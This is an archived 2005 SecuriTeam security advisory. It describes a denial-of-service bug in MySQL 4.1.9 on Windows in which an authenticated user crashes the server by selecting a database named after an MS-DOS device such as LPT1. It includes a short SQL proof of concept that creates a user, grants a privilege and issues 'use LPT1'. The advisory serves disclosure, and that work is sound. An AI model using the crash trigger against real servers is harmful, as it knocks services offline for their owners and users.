The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] MySQL Server for Windows Device Names DoS


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 15 Mar 2005 16:04:44 +0200
Subject: [NT] MySQL Server for Windows Device Names DoS
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050315143537.2780457C4@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  MySQL Server for Windows Device Names DoS
------------------------------------------------------------------------


SUMMARY

 <http://www.mysql.com>; MySQL is "an attractive alternative to 
higher-cost, more complex database technology".

A vulnerability exist within the MySQL server when it is launched under 
the Windows environment that allows a remote attacker that cause it to 
crash by using either of the two MS-DOS based device names: LPT1 and PRN.

DETAILS

Vulnerable Systems:
 * MySQL version 4.1.9 under Windows

This flaw allows an authenticated user with at least one of the following 
privileges to cause a denial of service attack:
 * REFERENCES
 * CREATE TEMPORARY TABLES
 * GRANT OPTION
 * CREATE
 * SELECT

Proof of Concept:
1. Create a user account:
(connected as 'root')
use mysql;
INSERT INTO user (Host,User,Password)  
VALUES('%','customer',PASSWORD('customer'));

2. Grant to him one or more privileges reported above:
(connected as 'root')
GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;

3. Connect to server using new account and 'use' the database 'LPT1':
(connected as 'customer')
use LPT1;

Vendor Status:
The vendor had confirm the existence of the bug:  
<http://bugs.mysql.com/bug.php?id=9148>; 
http://bugs.mysql.com/bug.php?id=9148


ADDITIONAL INFORMATION

The information has been provided by  <mailto:io@lucaercoli.it.> Luca 
Ercoli.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру